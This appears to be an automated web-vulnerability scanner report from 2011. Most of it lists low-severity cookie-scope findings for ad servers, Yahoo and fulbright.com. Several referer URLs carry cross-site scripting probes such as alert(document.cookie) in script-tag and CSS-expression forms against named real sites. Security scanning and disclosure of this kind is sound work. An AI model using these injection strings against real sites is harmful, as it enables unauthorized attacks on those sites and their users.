GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=301 Expires: Wed, 19 Jan 2011 15:55:44 GMT Date: Wed, 19 Jan 2011 15:50:43 GMT Connection: close Content-Length: 2277
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]...
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fmr.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 912 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=284 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:15 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FFgeo=5386156;expires=Thu, 19 Jan 2012 15:50:46 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ZFFAbh=749B826,20|1483_749#365;expires=Thu, 19 Jan 2012 15:50:47 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 179 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 15:51:10 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 15:51:10 GMT; Path=/ Set-Cookie: di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 12:57:24 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 15:51:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 15:51:10 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gateway/gw.js?csid=K08784&auto=t HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==
//Vermont-12.4.0-1012 var rsi_now= new Date(); var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /g.lt?nvst=12596&nvtt=z&nvup=1 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: ltcid=547362597; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2013 11:57:37 GMT Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2011 15:57:37 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 17:57:37 GMT Server: lighttpd/1.4.19 Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Austin HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Denver HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /London HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LosAngeles HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Minneapolis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Riyadh HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aop HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
